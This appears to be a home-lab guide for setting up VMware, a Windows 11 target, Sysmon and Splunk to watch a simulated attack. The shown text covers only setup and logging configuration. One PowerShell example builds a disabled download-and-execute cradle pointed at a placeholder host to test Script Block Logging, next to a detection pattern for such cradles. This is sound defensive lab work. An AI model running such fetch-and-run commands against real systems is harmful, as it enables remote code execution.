You Give HR A Bad PDF
Description
A home lab built on VMware Workstation Pro simulates an attack between a Kali Linux VM (attacker) and a Windows 11 VM (target). The setup shows how Metasploit scripts are used on the attacker side and how the resulting activity on the target is monitored in real time with Sysmon and Splunk.
Prerequisites
VMware Workstation Pro Setup
VMware Workstation Pro is a type 2 hypervisor: it runs on top of the host operating system and isolates each virtual machine from the host and from the other VMs, while providing virtual networks through which the lab machines can talk to each other. The installation is as follows:
- Download VMware Workstation Pro, which is hosted at: https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion.
- Verify the installer's integrity against the published checksums; the SHA-256 and MD5 values are listed on the installer's download page. Open a PowerShell terminal in the download folder and execute:
Get-FileHash <file-name>
Get-FileHash uses SHA-256 by default, so its output can be compared directly with the SHA-256 value on the page. Prefer the SHA-256 value over MD5, since MD5 is no longer collision resistant.

- Proceed with the installation of VMware Workstation Pro by accepting the End-User License Agreement.
- If Hyper-V or Device/Credential Guard is enabled on the host, the installer reports a compatible setup: the virtual machines will then be launched through the Windows Hypervisor Platform (WHP) instead of VMware's own virtual machine monitor.

- After setting the installation folder, tick the box Check for product updates on startup so the hypervisor stays patched; known VM escape bugs are fixed in updates, and an unpatched hypervisor weakens the isolation between the attacker VM, the target VM and the host. Joining the VMware Customer Experience Improvement Program is optional.
- Finally, choose whether to create the shortcuts, then click Install. The VMware Workstation Pro interface opens once the installer finishes.
Windows Setup
Windows 11 is the current desktop operating system from Microsoft. In this lab it runs as a guest VM and is the target that will be attacked from the Kali Linux VM.
- Download the Windows 11 Installation Media from: https://www.microsoft.com/en-us/software-download/windows11.
- In the Media Creation Tool, at the Choose which media to use step, select ISO file.
- In VMware, click Create a New Virtual Machine, choose the Typical configuration and load the Windows .iso image.
- At the Encryption Information step, choose to encrypt all the files and set a password that you store in a safe place, such as a password manager, on the host machine. Windows 11 requires a virtual TPM, and VMware Workstation only allows a vTPM on an encrypted VM, which is why this step cannot be skipped. Also, select Store virtual disk as a single file in the Specify Disk Capacity section. Note: by default the 64 GB of storage is not pre-allocated; the disk file grows as the guest writes to it.
- The summary shows the recommended hardware settings; one of them must be changed manually, so click Customize Hardware... The network adapter defaults to NAT, which shares the host's internet connection, and with internet access the Windows 11 setup insists on signing in with a Microsoft account. Select Host-only instead, so the VM stays offline during setup and a local account can be created.
- Finish the machine creation and click Power on this virtual machine.
- During the configuration process, make sure to select I don't have a product key. Then select Windows 11 Pro, because the Home edition cannot act as a Remote Desktop (RDP) host; see https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-supported-config.
- When the setup asks to connect to a network, press Shift+F10 to open a command prompt and execute:
oobe\bypassnro
The machine restarts and the I don't have internet option becomes available; select it and finish the setup with a local account.
- After the Windows setup, go to the VM tab and select Install VMware Tools for a smoother virtualization experience (guest drivers, display scaling, clipboard sharing). VMware mounts a virtual drive and offers to run setup64.exe; click it and follow the default options.
- To give the VM internet access, right click the machine name in the left bar, select Settings..., and in the Network Adapter section choose NAT. NAT places the VM on a private virtual network and translates its outbound traffic through the host's IP address, so it reaches the internet without being exposed on the host's physical network the way a Bridged adapter would be.
- Finally, so that the fresh install can be restored later, go to the VM tab, click Snapshot and then Take Snapshot..., assign a name like "Fresh Install" and click Take Snapshot.
Sysmon Setup
Sysmon (System Monitor) is a Windows service and device driver from Sysinternals that logs process creation, network connections, file and registry changes and other system activity to the Windows event log. It runs on the Windows VM.
- Inside the Windows VM, go to: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon and click Download Sysmon.
- Sysmon is installed with a configuration file that decides which events are recorded. A balanced, community-maintained one is the sysmon-modular config at: https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml. Right click, select Save as, and keep it in a memorable location.
- Open the Downloads folder and extract Sysmon.zip. Then drag and drop sysmonconfig.xml into the extracted sysmon folder, next to Sysmon64.exe.
- Open PowerShell as administrator in that folder and execute the following command to install Sysmon with the configuration file:
.\Sysmon64.exe -i .\sysmonconfig.xml
Accept the license agreement when prompted (or add -accepteula to the command); the installer registers the Sysmon64 service and its driver.

- To check that Sysmon is up and running, press the Windows key, search for Services, open it and look for Sysmon64. The events themselves are visible in Event Viewer under Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational.
Splunk Setup
Splunk Enterprise is a platform for searching, monitoring and analyzing machine data, used here as a Security Information and Event Management (SIEM) tool. It runs on the Windows VM.
- Inside the Windows VM, go to: https://www.splunk.com/en_us/download/splunk-enterprise.html. An account is required; the Enterprise trial lasts 60 days, after which the instance can be converted to the Splunk Free license, which is enough for a single-machine lab. A temporary mailbox such as https://temp-mail.org/ can be used for the registration.

- Click Download Now to get the Splunk installer. The installer's integrity can be checked in the same way as in the VMware setup: click More and then Download SHA512 to verify your bits. The downloaded file is plain text and can be opened with Notepad. Because the published digest is SHA-512, the algorithm must be passed to Get-FileHash explicitly (its default is SHA-256):
Get-FileHash <file-name> -Algorithm SHA512
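A reusable check for both downloads (the VMware installer with its page-published SHA-256 and the Splunk installer with its .sha512 file), as an added example that is not part of the original write-up. The file names and the expected hash placeholder below are assumptions; substitute the real values from the vendors' download pages.

```powershell
# Added example (not from the original write-up): compare a downloaded installer
# against the vendor-published digest before running it. File names and the
# expected-hash placeholder are assumptions; replace them with the real values.

function Test-InstallerHash {
    param(
        [Parameter(Mandatory)] [string] $Path,      # installer on disk
        [Parameter(Mandatory)] [string] $Expected,  # hex digest, or path to a vendor hash file
        [ValidateSet('SHA256', 'SHA512', 'MD5')] [string] $Algorithm = 'SHA256'
    )

    # Vendor hash files are usually "<hex>  <filename>" (Splunk's .sha512 is one);
    # if $Expected is not itself a hex string, treat it as such a file and pull
    # the first hex token out of it.
    if ($Expected -notmatch '^[0-9a-fA-F]{32,128}$') {
        if (-not [System.IO.File]::Exists($Expected)) {
            throw "Expected value is neither a hex digest nor an existing hash file: $Expected"
        }
        $Expected = (Get-Content -LiteralPath $Expected -Raw) -split '\s+' |
            Where-Object { $_ -match '^[0-9a-fA-F]{32,128}$' } |
            Select-Object -First 1
        if (-not $Expected) { throw 'No hex digest found in the hash file' }
    }

    $actual = (Get-FileHash -LiteralPath $Path -Algorithm $Algorithm).Hash

    # Digest comparison is case-insensitive; vendors publish either case.
    $ok = $actual.Equals($Expected.Trim(), [System.StringComparison]::OrdinalIgnoreCase)
    [pscustomobject]@{
        File      = Split-Path -Leaf $Path
        Algorithm = $Algorithm
        Expected  = $Expected.ToLower()
        Actual    = $actual.ToLower()
        Match     = $ok
    }
}

# Usage (assumed file names). VMware publishes SHA-256 and MD5 on the page;
# use the SHA-256 value. Splunk ships a .sha512 file next to the installer.
$results = @(
    Test-InstallerHash -Path "$env:USERPROFILE\Downloads\VMware-workstation-full.exe" `
                       -Expected 'PASTE-THE-SHA256-FROM-THE-VMWARE-DOWNLOAD-PAGE'
    Test-InstallerHash -Path "$env:USERPROFILE\Downloads\splunk-enterprise.msi" `
                       -Expected "$env:USERPROFILE\Downloads\splunk-enterprise.msi.sha512" `
                       -Algorithm SHA512
)
$results | Format-Table -AutoSize

# Never run an installer whose digest differs from the published one.
if ($results.Match -contains $false) {
    Write-Error 'Hash mismatch: delete the download and fetch it again over HTTPS.'
    exit 1
}
```

With the placeholder left in place the first call throws on purpose, so the script cannot silently pass until a real digest has been pasted in.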
- Execute the Splunk installer and follow the default settings. Splunk is installed to run under the Local System account of the Windows VM. Only switch to Domain Account if this instance must collect data from other machines in an Active Directory domain (for example over WMI), which is not needed in this lab.
- Splunk is now installed and reachable at http://127.0.0.1:8000/
In order to log the system events data, below the
Common taskstab, click onAdd data.
Then, click on
Monitor.
Select
Local Event Logsand chooseApplication,SecurityandSystem, which are standard for monitoring endpoints.
Leave the default host value and click on
Create a new index.
The index can be called
endpoint, which will be the Windows host’s searchable repository for ingested data.
The Input Settings should look like the following.

After that, click on
Reviewand then onSubmit.
Now, the logs can be retrieved by querying the endpoint index, for example:
source="WinEventLog:*" host="DESKTOP-I6QV43M" index="endpoint"
- Install the Splunk Add-on for Sysmon via Apps -> Find More Apps. Search for Sysmon and click Install. The add-on parses the XML Sysmon events so that their fields (EventCode, Image, CommandLine and so on) become searchable.
- To ensure that Sysmon logs are ingested into Splunk, go to C:\Program Files\Splunk\etc\system\local and look for the file inputs.conf. If it is not there, create a new, empty inputs.conf in the local folder: Splunk reads default\inputs.conf first and applies local\inputs.conf on top of it, so local only needs to contain the additions (copying the whole default file into local also works, but it is not the recommended practice). Open inputs.conf, go to the bottom and paste the following configuration:

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
index = endpoint
disabled = false
renderXml = true
source = XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

[WinEventLog://Microsoft-Windows-Windows Defender/Operational]
index = endpoint
disabled = false
source = Microsoft-Windows-Windows Defender/Operational
blacklist = 1000,1001,1002,1150,1151,2000

[WinEventLog://Microsoft-Windows-PowerShell/Operational]
index = endpoint
disabled = false
source = Microsoft-Windows-PowerShell/Operational
blacklist = 4105,4106,40961,40962

[WinEventLog://Application]
index = endpoint
disabled = false

[WinEventLog://Security]
index = endpoint
disabled = false

[WinEventLog://System]
index = endpoint
disabled = false

Each stanza names a Windows event log channel and routes it to the endpoint index. renderXml = true collects the Sysmon events in their XML form, which is the format the Splunk Add-on for Sysmon expects. The blacklist settings drop the listed event IDs at collection time, which reduces the noise from routine scanning and operational messages. The blacklisted IDs are:
- Windows Defender: based on the official Microsoft Defender documentation.
- 1000: An antimalware scan started.
- 1001: An antimalware scan finished.
- 1002: An antimalware scan was stopped before it finished.
- 1150: The antimalware platform is running and in a healthy state.
- 1151: Endpoint Protection client health report.
- 2000: The antimalware definitions updated successfully.
- PowerShell: based on S0cm0nkey's Security Reference Guide and MyEventLog.
- 4105: Script Block Execution start.
- 4106: Script Block Execution stop.
- 40961: PowerShell console is starting up.
- 40962: PowerShell console is ready for user input.
Note: Event ID 4104 is Script Block Logging, which records the actual PowerShell code that ran and is the event to hunt suspicious commands in. Keeping 4104 while dropping 4105 and 4106 (which only mark the start and end of each block's execution and generate a lot of noise) is the better approach. For further reference: Malware Archeology and Black Hills Information Security.
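Event ID 4104 is only produced in full once Script Block Logging is enabled (PowerShell 5 and later log blocks they classify as suspicious at Warning level even without the policy, but not everything). The following added example, which is not part of the original write-up, turns the policy on through its documented registry key, compiles a harmless block that looks like a download cradle, and then pulls the 4104 events that match a handful of common cradle and obfuscation markers. The marker string, the example.invalid URL and the regular expression are constructed for the demonstration.

```powershell
# Added example (not from the original write-up): make sure Event ID 4104 is
# actually produced, then pull the script blocks that carry common cradle and
# obfuscation markers. The registry path is the documented ScriptBlockLogging
# policy key; the search terms are a starting point, not a complete detection.

# Script Block Logging is off by default; this is the value Group Policy writes.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord

# Compile a block shaped like the classic download cradle. It is harmless: the
# guard is $false, so the URL (a reserved, non-resolving name) is never fetched.
$marker = "sblcheck-$(Get-Random)"
$sb = [scriptblock]::Create(
    "if (`$false) { Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/$marker') }")
& $sb
Start-Sleep -Seconds 2

# 4104 events live in Microsoft-Windows-PowerShell/Operational; the script text
# is the ScriptBlockText entry of the event's XML EventData.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 200 -ErrorAction Stop

# Constructed hunting pattern: cradles, in-memory execution, encoded commands
$suspicious = '(?i)Invoke-Expression|\bIEX\b|DownloadString|FromBase64String|-EncodedCommand|-enc\b'

$events |
    ForEach-Object {
        $x    = [xml]$_.ToXml()
        $text = ($x.Event.EventData.Data | Where-Object Name -eq 'ScriptBlockText').'#text'
        [pscustomobject]@{ Time = $_.TimeCreated; Level = $_.LevelDisplayName; Script = $text }
    } |
    Where-Object { $_.Script -match $suspicious } |
    Select-Object -First 10 |
    Format-Table -Wrap

# Sanity check: the marker block must be among the logged events
if (-not ($events | Where-Object { $_.Message -like "*$marker*" })) {
    Write-Warning 'Marker not found in 4104 events; open a new PowerShell session and re-run (the policy is read at startup)'
}
```

Because the test block contains Invoke-Expression and DownloadString, PowerShell's built-in suspicious-block heuristic logs it at Warning level even if the policy has not taken effect yet; the Level column shows which case you are in.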
After saving the configuration, restart the Splunkd Service (Services -> Splunkd Service -> Restart) so that the new inputs are read.
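The same change applied from PowerShell, together with a check that Sysmon events actually reach the endpoint index, as an added example that is not part of the original write-up. It assumes the default Splunk install path and the admin credentials chosen at first login (placeholder below); only the Sysmon stanza is written here, the others from the configuration above can be appended the same way.

```powershell
# Added example (not from the original write-up): add the Sysmon input stanza to
# etc\system\local\inputs.conf only if it is missing, restart Splunkd, and
# confirm events arrive. Install path and credentials are assumptions.

$splunkHome = 'C:\Program Files\Splunk'
$inputs     = Join-Path $splunkHome 'etc\system\local\inputs.conf'
$splunkExe  = Join-Path $splunkHome 'bin\splunk.exe'
$auth       = 'admin:CHANGE-ME'   # assumption: the account created at first login

$stanzaName = '[WinEventLog://Microsoft-Windows-Sysmon/Operational]'
$stanza = @"

$stanzaName
index = endpoint
disabled = false
renderXml = true
source = XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
"@

# local\ may not exist on a fresh install. Only overrides belong there, so a new
# file holding just our stanzas is cleaner than copying default\inputs.conf.
New-Item -ItemType Directory -Force -Path (Split-Path $inputs) | Out-Null
if (-not (Test-Path $inputs) -or
    -not (Select-String -Path $inputs -SimpleMatch $stanzaName -Quiet)) {
    Add-Content -Path $inputs -Value $stanza -Encoding ASCII
    "Stanza appended to $inputs"
} else {
    "Stanza already present, leaving $inputs unchanged"
}

# Show the merged view Splunk will use (default + local) and which file each
# setting came from; a typo in the stanza name shows up as an empty result here.
& $splunkExe btool inputs list 'WinEventLog://Microsoft-Windows-Sysmon/Operational' --debug

# Input changes are read at startup
Restart-Service -Name Splunkd

# Give the input time to pick up existing events, then count them by Sysmon
# event ID. EventCode is extracted once the Splunk Add-on for Sysmon is installed.
Start-Sleep -Seconds 30
$spl = 'index=endpoint source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" earliest=-15m | stats count by EventCode | sort -count'
& $splunkExe search $spl -auth $auth -maxout 20
```

An empty result from the final search usually means one of three things: the stanza name does not match the channel exactly, the index name differs from the one created in the web UI, or Splunkd was not restarted after the edit; the btool output settles the first two.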